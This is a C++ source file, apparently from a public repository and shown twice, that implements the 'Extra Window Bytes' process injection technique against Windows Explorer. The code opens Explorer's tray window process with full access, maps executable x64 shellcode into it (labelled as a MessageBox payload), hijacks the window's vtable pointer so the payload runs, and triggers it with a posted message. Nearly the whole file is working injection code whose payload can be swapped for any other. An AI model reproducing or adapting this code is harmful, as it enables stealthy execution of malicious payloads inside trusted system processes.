farzinenddo/ExtraByte_ProcessInjection.cpp

## ExtraByte_ProcessInjection.cpp
#include "stdafx.h"
#include <Windows.h>

// messagebox(x64) shellcode
unsigned char shellcode[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51"
"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48"
"\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48"
"\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02"
"\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e"
"\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88"
"\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48"
"\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e"
"\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41"
"\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24"
"\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e"
"\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1"
"\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e\x4c\x8d"
"\x85\x2d\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x4d\x61\x70\x70\x69"
"\x6e\x67\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x21\x00\x4d"
"\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00";

typedef enum _SECTION_INHERIT {
	ViewShare = 1,
	ViewUnmap = 2
} SECTION_INHERIT;

typedef NTSTATUS(WINAPI *TypeNtMapViewOfSection)(
	HANDLE SectionHandle,
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	ULONG_PTR ZeroBits,
	SIZE_T CommitSize,
	PLARGE_INTEGER SectionOffset,
	PSIZE_T ViewSize,
	DWORD InheritDisposition,
	ULONG AllocationType,
	ULONG Win32Protect);

typedef struct _ctray_vtable {
	ULONG_PTR vTable;
	ULONG_PTR AddRef;
	ULONG_PTR Release;
	ULONG_PTR WndProc;
} CTray;

VOID extraBytes() {
	LPVOID    cs, ds;
	CTray     ct;
	ULONG_PTR ctp;
	HWND      hw;
	HANDLE    hp;
	DWORD     pid;
	SIZE_T    wr;

	HMODULE ntdll = GetModuleHandleA("ntdll.dll");
	TypeNtMapViewOfSection pNtMapViewOfSection = (TypeNtMapViewOfSection)GetProcAddress(ntdll, "NtMapViewOfSection");

	hw = FindWindow(L"Shell_TrayWnd", NULL);
	GetWindowThreadProcessId(hw, &pid);
	hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
	ctp = GetWindowLongPtr(hw, 0);
	ReadProcessMemory(hp, (LPVOID)ctp,(LPVOID)&ct.vTable, sizeof(ULONG_PTR), &wr);
	ReadProcessMemory(hp, (LPVOID)ct.vTable,(LPVOID)&ct.AddRef, sizeof(ULONG_PTR) * 3, &wr);
	HANDLE hFileMap = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(shellcode), NULL);
	LPVOID lpMapAddress = MapViewOfFile(hFileMap, FILE_MAP_WRITE, 0, 0, sizeof(shellcode));
	memcpy((PVOID)lpMapAddress, shellcode, sizeof(shellcode));
	LPVOID requested_target_payload = 0;
	SIZE_T view_size = 0;
	pNtMapViewOfSection(hFileMap, hp, &requested_target_payload, 0, sizeof(shellcode), NULL, &view_size, ViewUnmap, 0, PAGE_EXECUTE_READWRITE);
	ds = VirtualAllocEx(hp, NULL, sizeof(ct),MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

	ct.vTable = (ULONG_PTR)ds + sizeof(ULONG_PTR);
	ct.WndProc = (ULONG_PTR)requested_target_payload;

	WriteProcessMemory(hp, ds, &ct, sizeof(ct), &wr);
	SetWindowLongPtr(hw, 0, (ULONG_PTR)ds);
	PostMessage(hw, WM_CLOSE, 0, 0);
	SetWindowLongPtr(hw, 0, ctp);
	VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
	VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);

	CloseHandle(hp);
}

int main()
{
	extraBytes();
    return 0;
}
	#include "stdafx.h"
	#include <Windows.h>

	// messagebox(x64) shellcode
	unsigned char shellcode[] =
	"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51"
	"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48"
	"\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48"
	"\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02"
	"\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e"
	"\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88"
	"\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48"
	"\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e"
	"\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41"
	"\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24"
	"\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0"
	"\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e"
	"\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
	"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
	"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1"
	"\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e\x4c\x8d"
	"\x85\x2d\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff"
	"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
	"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
	"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x4d\x61\x70\x70\x69"
	"\x6e\x67\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x21\x00\x4d"
	"\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00";

	typedef enum _SECTION_INHERIT {
	ViewShare = 1,
	ViewUnmap = 2
	} SECTION_INHERIT;

	typedef NTSTATUS(WINAPI *TypeNtMapViewOfSection)(
	HANDLE SectionHandle,
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	ULONG_PTR ZeroBits,
	SIZE_T CommitSize,
	PLARGE_INTEGER SectionOffset,
	PSIZE_T ViewSize,
	DWORD InheritDisposition,
	ULONG AllocationType,
	ULONG Win32Protect);

	typedef struct _ctray_vtable {
	ULONG_PTR vTable;
	ULONG_PTR AddRef;
	ULONG_PTR Release;
	ULONG_PTR WndProc;
	} CTray;

	VOID extraBytes() {
	LPVOID cs, ds;
	CTray ct;
	ULONG_PTR ctp;
	HWND hw;
	HANDLE hp;
	DWORD pid;
	SIZE_T wr;

	HMODULE ntdll = GetModuleHandleA("ntdll.dll");
	TypeNtMapViewOfSection pNtMapViewOfSection = (TypeNtMapViewOfSection)GetProcAddress(ntdll, "NtMapViewOfSection");

	hw = FindWindow(L"Shell_TrayWnd", NULL);
	GetWindowThreadProcessId(hw, &pid);
	hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
	ctp = GetWindowLongPtr(hw, 0);
	ReadProcessMemory(hp, (LPVOID)ctp,(LPVOID)&ct.vTable, sizeof(ULONG_PTR), &wr);
	ReadProcessMemory(hp, (LPVOID)ct.vTable,(LPVOID)&ct.AddRef, sizeof(ULONG_PTR) * 3, &wr);
	HANDLE hFileMap = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(shellcode), NULL);
	LPVOID lpMapAddress = MapViewOfFile(hFileMap, FILE_MAP_WRITE, 0, 0, sizeof(shellcode));
	memcpy((PVOID)lpMapAddress, shellcode, sizeof(shellcode));
	LPVOID requested_target_payload = 0;
	SIZE_T view_size = 0;
	pNtMapViewOfSection(hFileMap, hp, &requested_target_payload, 0, sizeof(shellcode), NULL, &view_size, ViewUnmap, 0, PAGE_EXECUTE_READWRITE);
	ds = VirtualAllocEx(hp, NULL, sizeof(ct),MEM_COMMIT \| MEM_RESERVE, PAGE_READWRITE);

	ct.vTable = (ULONG_PTR)ds + sizeof(ULONG_PTR);
	ct.WndProc = (ULONG_PTR)requested_target_payload;

	WriteProcessMemory(hp, ds, &ct, sizeof(ct), &wr);
	SetWindowLongPtr(hw, 0, (ULONG_PTR)ds);
	PostMessage(hw, WM_CLOSE, 0, 0);
	SetWindowLongPtr(hw, 0, ctp);
	VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT \| MEM_RELEASE);
	VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT \| MEM_RELEASE);

	CloseHandle(hp);
	}

	int main()
	{
	extraBytes();
	return 0;
	}